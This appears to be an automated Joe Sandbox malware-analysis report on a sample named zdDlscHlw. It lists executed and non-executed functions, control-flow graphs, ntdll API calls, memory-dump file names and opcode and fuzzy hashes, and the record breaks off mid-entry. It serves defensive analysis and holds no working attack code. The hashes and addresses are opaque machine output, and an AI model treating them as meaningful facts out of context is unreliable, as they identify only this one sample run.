                                                • Opcode ID: 82c4b35a944df5015824134df7f9f66fad35828ca857086779558481c2bbd204
                                                • Instruction ID: b6ba558a3b767693f5a6b00a9b54b079d1ca59d74ab826e14c1d568735c43ab5
                                                • Opcode Fuzzy Hash: 82c4b35a944df5015824134df7f9f66fad35828ca857086779558481c2bbd204
                                                • Instruction Fuzzy Hash: BCB09225258342E2660063684CE6A9A6822EBA6B01B808C17A24A0000185A1842CE62B

                                                Execution Graph

                                                Execution Coverage:0.1%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:5
                                                Total number of Limit Nodes:1
                                                execution_graph 62716 1452df0 LdrInitializeThunk 62717 1452c00 62719 1452c0a 62717->62719 62720 1452c11 62719->62720 62721 1452c1f LdrInitializeThunk 62719->62721

                                                Executed Functions

                                                Function 01452C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 1452c0a-1452c0f 1 1452c11-1452c18 0->1 2 1452c1f-1452c26 LdrInitializeThunk 0->2
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0146FD4F,000000FF,00000024,01506634,00000004,00000000,?,-00000018,7D810F61,?,?,01428B12,?,?,?,?), ref: 01452C24
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3ea2f2df63bec2df8ad88c2789c2fa908cb49d7db8661fadef020ced1b22c93b
                                                • Instruction ID: 50992192b305ff3528651dfe7f87b06346117b078d8ee56506c7cd7c8e7fe88f
                                                • Opcode Fuzzy Hash: 3ea2f2df63bec2df8ad88c2789c2fa908cb49d7db8661fadef020ced1b22c93b
                                                • Instruction Fuzzy Hash: CAB09BB19015C5C5DB52E7644608B1B7A0477D0705F15C063D7030653F4778C1D1E276
                                                Function 01452DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4 1452df0-1452dfc LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0148E73E,0000005A,014ED040,00000020,00000000,014ED040,00000080,01474A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0145AE00), ref: 01452DFA
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: fd3802c29216df61fa2ead2bc1e43048f56c76d12dbcbf78a56c8c28a2bcaa1b
                                                • Instruction ID: c8116c9872de0c67db5ad6d0c23528e9601cf2ebf2d3c05170d94e840a021bbb
                                                • Opcode Fuzzy Hash: fd3802c29216df61fa2ead2bc1e43048f56c76d12dbcbf78a56c8c28a2bcaa1b
                                                • Instruction Fuzzy Hash: 019002B120150513D1117158450470B010D97E0245F95C413A4424559DD7668A52A222
                                                Function 014535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 14535c0-14535cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: fa04dfdf537a1659b0faae2f2893374d2cf7f4ba56f42dd85fba72dbeb256b46
                                                • Instruction ID: 0942d6edea510284d8d7094049b8d213bb93496acc2206cf86893c59d787cb90
                                                • Opcode Fuzzy Hash: fa04dfdf537a1659b0faae2f2893374d2cf7f4ba56f42dd85fba72dbeb256b46
                                                • Instruction Fuzzy Hash: 979002B160560502D1007158451470A110997E0205F65C412A4424569DC7A58A5166A3
                                                Function 0042E8A4 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 6 42e8a4-42e8a6 7 42e8a8-42e8ad 6->7 8 42e86f-42e871 6->8 11 42e8ff-42e906 7->11 12 42e8af-42e8b2 7->12 9 42e873-42e87b 8->9 10 42e8c1-42e8de 8->10 14 42e893-42e896 9->14 15 42e87d-42e885 9->15 18 42e8df 10->18 17 42e909-42e931 11->17 16 42e8b4-42e8de 12->16 12->17 15->14 19 42e887-42e891 15->19 16->18 24 42e933-42e936 17->24 25 42e937-42e941 17->25 20 42e8e4-42e8f5 18->20 19->14 21 42e897-42e89d 19->21 21->14 23 42e89f-42e8a3 21->23
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25a5e6b8e6ff9c72c320d1583783e05ec00dab4a00ff22782d81fc44293978c5
                                                • Instruction ID: 51db822ec13e8ab98872101987603bdf61165c67e5fd0f667f39fca90ca4d4ee
                                                • Opcode Fuzzy Hash: 25a5e6b8e6ff9c72c320d1583783e05ec00dab4a00ff22782d81fc44293978c5
                                                • Instruction Fuzzy Hash: D02195B1610209AFDB00DF96DC81EEB37A9EB88710F44856AF9188B341E674E950CBA4
                                                Function 0042E4F3 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 38 42e4f3-42e534 call 42e9e3 42 42e536-42e553 38->42 43 42e58e-42e593 38->43 45 42e566-42e58b 42->45 46 42e555-42e55d 42->46 45->43 48 42e563 46->48 48->45
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86d152cfd755bf89d7b19b803edcd056883acbb0f726a688dc7236ef142aa53e
                                                • Instruction ID: 6536ffcc9c3b0048ebaa90428f329d9984c0ca0239fb8df35c6df5a0615c4489
                                                • Opcode Fuzzy Hash: 86d152cfd755bf89d7b19b803edcd056883acbb0f726a688dc7236ef142aa53e
                                                • Instruction Fuzzy Hash: F30188B1E0021866EB60EB969C42FDDB7B89B08304F440ADAF50CA2581FF7497CC8F95
                                                Function 0042E4F1 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 26 42e4f1-42e50a 27 42e519-42e520 26->27 28 42e514 call 42e9e3 26->28 29 42e52f-42e534 27->29 28->27 30 42e536-42e53f 29->30 31 42e58e-42e593 29->31 32 42e54e-42e553 30->32 33 42e566-42e58b 32->33 34 42e555-42e55d 32->34 33->31 36 42e563 34->36 36->33
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5fff53844ad7635d14ce47dfaaa7d2cb153b7462868a25b6143d9e021cdeaac
                                                • Instruction ID: e3a7b402a86e856c6b7230859ae608618436a70a277da39832eaf962ff5f8136
                                                • Opcode Fuzzy Hash: d5fff53844ad7635d14ce47dfaaa7d2cb153b7462868a25b6143d9e021cdeaac
                                                • Instruction Fuzzy Hash: 4B0152B1E4021866EB60EBA59C42FDDB7B89B08314F440ADAF50CA6581FF7497CC8F95
                                                Function 0042E86A Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 50 42e86a-42e86b 51 42e8df 50->51 52 42e86d-42e871 50->52 55 42e8e4-42e8f5 51->55 53 42e873-42e87b 52->53 54 42e8c1-42e8de 52->54 56 42e893-42e896 53->56 57 42e87d-42e885 53->57 54->51 57->56 58 42e887-42e891 57->58 58->56 59 42e897-42e89d 58->59 59->56 60 42e89f-42e8a3 59->60
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69968d297eeab42c0527e52a92b0eb89c8de6e57ecedec53052c9ed9b61f21a7
                                                • Instruction ID: 8330654274930f62e300c394a12d87f98bb8e1057f388f223c9a356a065d7175
                                                • Opcode Fuzzy Hash: 69968d297eeab42c0527e52a92b0eb89c8de6e57ecedec53052c9ed9b61f21a7
                                                • Instruction Fuzzy Hash: 37F0C831B102089BDB04DF96EC84EF777A9EB44B10F44867AF5288B381DB78D9408B98
                                                Function 0042EA19 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 61 42ea19-42ea22 62 42ea23-42ea35 61->62 63 42ea3b-42ea42 62->63 64 42ea56-42ea59 63->64 65 42ea44-42ea46 63->65 65->64 66 42ea48-42ea54 call 42e9e3 65->66 66->64
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9521045b9953a7869eb17ba25c434d5dd5f962ed822bcf72c46946d0779b3ac6
                                                • Instruction ID: a8252fb9b6d72e90fff88e9f32f5a80d5f9592f42a5706108b645749e0bc429c
                                                • Opcode Fuzzy Hash: 9521045b9953a7869eb17ba25c434d5dd5f962ed822bcf72c46946d0779b3ac6
                                                • Instruction Fuzzy Hash: 3EE09B72B0132436D231555AAD06F5BBB9D9BC1BA0F45015AFA085B341D6B4A90082E9
                                                Function 0042EA23 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 72 42ea23-42ea35 73 42ea3b-42ea42 72->73 74 42ea56-42ea59 73->74 75 42ea44-42ea46 73->75 75->74 76 42ea48-42ea54 call 42e9e3 75->76 76->74
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 128419e31778370a2d0008fced28356bc7056254cd3877fc37f26048c4ce46ac
                                                • Instruction ID: bb7e46f97b8a1781468baf4f8ce71fc5d6662707fe6c93a67366e14e3de2d2c8
                                                • Opcode Fuzzy Hash: 128419e31778370a2d0008fced28356bc7056254cd3877fc37f26048c4ce46ac
                                                • Instruction Fuzzy Hash: FDE04F32B0022427C230559AAC06F5B776D9BC1BA0F45012AFE089B341E568E90082E9
                                                Function 0042E8B3 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 69 42e8b3-42e8df 71 42e8e4-42e8f5 69->71
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b53033de2d7a938e869628bd6b5d934c86ac0b790f9ebf02f7026811248c3f55
                                                • Instruction ID: 3f562ab833bb2e85ce3dd99096867104a18e3ce9b08c5f767f10bd9300a0e1f9
                                                • Opcode Fuzzy Hash: b53033de2d7a938e869628bd6b5d934c86ac0b790f9ebf02f7026811248c3f55
                                                • Instruction Fuzzy Hash: E7F098B6610209AFDB04CF59D885EDA73A9AB88750F048559BD198B241DB74EA508BA0
                                                Function 0042E943 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 79 42e943-42e953 80 42e959-42e95d 79->80
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71ec17ad8cd1b1084e609cf5749805a1698b2b259e64900bef593647b60697db
                                                • Instruction ID: 8450f38e604265a99eb0e3d55bcf5a836d15afe0aba1383b58b56268d4c61a2c
                                                • Opcode Fuzzy Hash: 71ec17ad8cd1b1084e609cf5749805a1698b2b259e64900bef593647b60697db
                                                • Instruction Fuzzy Hash: ECC08CB26403087FEB04EE8CEC87F2B37AC9B08624F404045BA0CCB382E570F91087A9

                                                Non-executed Functions

                                                Function 01454A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 81 1454a80-1454a8b 82 1454a8d-1454a99 RtlDebugPrintTimes 81->82 83 1454a9f-1454aa6 81->83 82->83 88 1454b25-1454b26 82->88 84 1454aaf-1454ab6 call 143f5a0 83->84 85 1454aa8-1454aae 83->85 90 1454b23 84->90 91 1454ab8-1454b22 call 1441e46 * 2 84->91 90->88 91->90
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0IFw$0IFw$0IFw$0IFw$0IFw$0IFw
                                                • API String ID: 3446177414-1820880178
                                                • Opcode ID: d7e37350875a04da4037222af428dafe38bd793a1b3300b687acd61b114d8d95
                                                • Instruction ID: 61094fe6bc39f9824c6f3410b7ae800f9916be73d59744a47512667b3fa69e62
                                                • Opcode Fuzzy Hash: d7e37350875a04da4037222af428dafe38bd793a1b3300b687acd61b114d8d95
                                                • Instruction Fuzzy Hash: 9701C072E051005ADB62DAA878147872AD1B3C8728F0A045AE91C8F2EFE3704C89E790
                                                Function 01452890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 292 1452890-14528b3 293 148a4bc-148a4c0 292->293 294 14528b9-14528cc 292->294 293->294 295 148a4c6-148a4ca 293->295 296 14528dd-14528df 294->296 297 14528ce-14528d7 294->297 295->294 298 148a4d0-148a4d4 295->298 300 14528e1-14528e5 296->300 297->296 299 148a57e-148a585 297->299 298->294 301 148a4da-148a4de 298->301 299->296 302 1452988-145298e 300->302 303 14528eb-14528fa 300->303 301->294 304 148a4e4-148a4eb 301->304 307 1452908-145290c 302->307 305 148a58a-148a58d 303->305 306 1452900-1452905 303->306 308 148a4ed-148a4f4 304->308 309 148a564-148a56c 304->309 305->307 306->307 307->300 310 145290e-145291b 307->310 312 148a50b 308->312 313 148a4f6-148a4fe 308->313 309->294 311 148a572-148a576 309->311 314 1452921 310->314 315 148a592-148a599 310->315 311->294 316 148a57c call 1460050 311->316 318 148a510-148a536 call 1460050 312->318 313->294 317 148a504-148a509 313->317 319 1452924-1452926 314->319 321 148a5a1-148a5c9 call 1460050 315->321 334 148a55d-148a55f 316->334 317->318 318->334 323 1452993-1452995 319->323 324 1452928-145292a 319->324 323->324 328 1452997-14529b1 call 1460050 323->328 329 1452946-1452966 call 1460050 324->329 330 145292c-145292e 324->330 342 1452969-1452974 328->342 329->342 330->329 331 1452930-1452944 call 1460050 330->331 331->329 340 1452981-1452985 334->340 342->319 343 1452976-1452979 342->343 343->321 344 145297f 343->344 344->340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID:
                                                • API String ID: 48624451-0
                                                • Opcode ID: 0aa8ece54bceae78b9bef48d26a1aa69e066645d8593dae2f5258cae25f02660
                                                • Instruction ID: 5b8e4ae5fc4f2d5e7c0b785f7fd161069bfccb5786d79225ab637780973052c5
                                                • Opcode Fuzzy Hash: 0aa8ece54bceae78b9bef48d26a1aa69e066645d8593dae2f5258cae25f02660
                                                • Instruction Fuzzy Hash: A351F6B6A00116BFCB51DF9D888097FFBB8BB08244714822BE865D7752D3B4DE4087A0
                                                Function 0142A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 345 142a250-142a26f 346 142a275-142a291 345->346 347 142a58d-142a594 345->347 348 14779e6-14779eb 346->348 349 142a297-142a2a0 346->349 347->346 350 142a59a-14779bb 347->350 349->348 351 142a2a6-142a2ac 349->351 350->346 355 14779c1-14779c6 350->355 353 142a2b2-142a2b4 351->353 354 142a6ba-142a6bc 351->354 353->348 357 142a2ba-142a2bd 353->357 356 142a6c2 354->356 354->357 358 142a473-142a479 355->358 359 142a2c3-142a2c6 356->359 357->348 357->359 360 142a2da-142a2dd 359->360 361 142a2c8-142a2d1 359->361 364 142a2e3-142a32b 360->364 365 142a6c7-142a6d0 360->365 362 142a2d7 361->362 363 14779cb-14779d5 361->363 362->360 367 14779da-14779e3 call 149f290 363->367 368 142a330-142a335 364->368 365->364 366 142a6d6-14779ff 365->366 366->367 367->348 371 142a33b-142a343 368->371 372 142a47c-142a47f 368->372 374 142a34f-142a35d 371->374 376 142a345-142a349 371->376 373 142a485-142a488 372->373 372->374 378 142a48e-142a49e 373->378 379 1477a16-1477a19 373->379 377 142a363-142a368 374->377 374->378 376->374 380 142a59f-142a5a8 376->380 381 142a36c-142a36e 377->381 378->379 383 142a4a4-142a4ad 378->383 379->381 382 1477a1f-1477a24 379->382 384 142a5c0-142a5c3 380->384 385 142a5aa-142a5ac 380->385 388 1477a26 381->388 389 142a374-142a38c call 142a6e0 381->389 390 1477a2b 382->390 383->381 386 1477a01 384->386 387 142a5c9-142a5cc 384->387 385->374 391 142a5b2-142a5bb 385->391 393 1477a0c 386->393 392 142a5d2-142a5d5 387->392 387->393 388->390 398 142a4b2-142a4b9 389->398 399 142a392-142a3ba 389->399 395 1477a2d-1477a2f 390->395 391->381 392->385 393->379 395->358 397 1477a35 395->397 400 142a3bc-142a3be 398->400 401 142a4bf-142a4c2 398->401 399->400 400->395 402 142a3c4-142a3cb 400->402 401->400 403 142a4c8-142a4d3 401->403 404 142a3d1-142a3d4 402->404 405 1477ae0 402->405 403->368 406 142a3e0-142a3ea 404->406 407 1477ae4-1477afc call 149f290 405->407 406->407 408 142a3f0-142a40c call 142a840 406->408 407->358 413 142a412-142a417 408->413 414 142a5d7-142a5e0 408->414 413->358 415 142a419-142a43d 413->415 416 142a5e2-142a5eb 414->416 417 142a601-142a603 414->417 418 142a440-142a443 415->418 416->417 419 142a5ed-142a5f1 416->419 420 142a605-142a623 call 1414508 417->420 421 142a629-142a631 417->421 422 142a4d8-142a4dc 418->422 423 142a449-142a44c 418->423 424 142a681-142a6ab RtlDebugPrintTimes 419->424 425 142a5f7-142a5fb 419->425 420->358 420->421 430 142a4e2-142a4e5 422->430 431 1477a3a-1477a42 422->431 427 142a452-142a454 423->427 428 1477ad6 423->428 424->417 439 142a6b1-142a6b5 424->439 425->417 425->424 433 142a520-142a539 call 142a6e0 427->433 434 142a45a-142a461 427->434 428->405 435 142a634-142a64a 430->435 437 142a4eb-142a4ee 430->437 431->435 436 1477a48-1477a4c 431->436 451 142a65e-142a665 433->451 452 142a53f-142a567 433->452 440 142a467-142a46c 434->440 441 142a57b-142a582 434->441 442 142a650-142a659 435->442 443 142a4f4-142a50c 435->443 436->435 444 1477a52-1477a5b 436->444 437->423 437->443 439->417 440->358 447 142a46e 440->447 441->406 448 142a588 441->448 442->427 443->423 445 142a512-142a51b 443->445 449 1477a85-1477a87 444->449 450 1477a5d-1477a60 444->450 445->427 447->358 448->405 449->435 453 1477a8d-1477a96 449->453 454 1477a62-1477a6c 450->454 455 1477a6e-1477a71 450->455 458 142a569-142a56b 451->458 459 142a66b-142a66e 451->459 452->458 453->427 460 1477a81 454->460 456 1477a73-1477a7c 455->456 457 1477a7e 455->457 456->453 457->460 458->440 461 142a571-142a573 458->461 459->458 462 142a674-142a67c 459->462 460->449 463 142a579 461->463 464 1477a9b-1477aa4 461->464 462->418 463->441 464->463 465 1477aaa-1477ab0 464->465 465->463 466 1477ab6-1477abe 465->466 466->463 467 1477ac4-1477acf 466->467 467->466 468 1477ad1 467->468 468->463
                                                Strings
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014779D5
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 014779D0, 014779F5
                                                • SsHd, xrefs: 0142A3E4
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014779FA
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                • API String ID: 0-929470617
                                                • Opcode ID: 104e8fb2a21a495119319d6d49d5e1b0a3d209c47ceb2bf22be1741f416b6388
                                                • Instruction ID: 5cae79c3cd96a9c9d0643051faf61e14c3ae4807be8622e59a18894d7a936927
                                                • Opcode Fuzzy Hash: 104e8fb2a21a495119319d6d49d5e1b0a3d209c47ceb2bf22be1741f416b6388
                                                • Instruction Fuzzy Hash: C7E1D5706043118FE725CE28C888B6BBBE1BB84254FA44A2FED95CB7A1D771D9C5CB41
                                                Function 0142D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
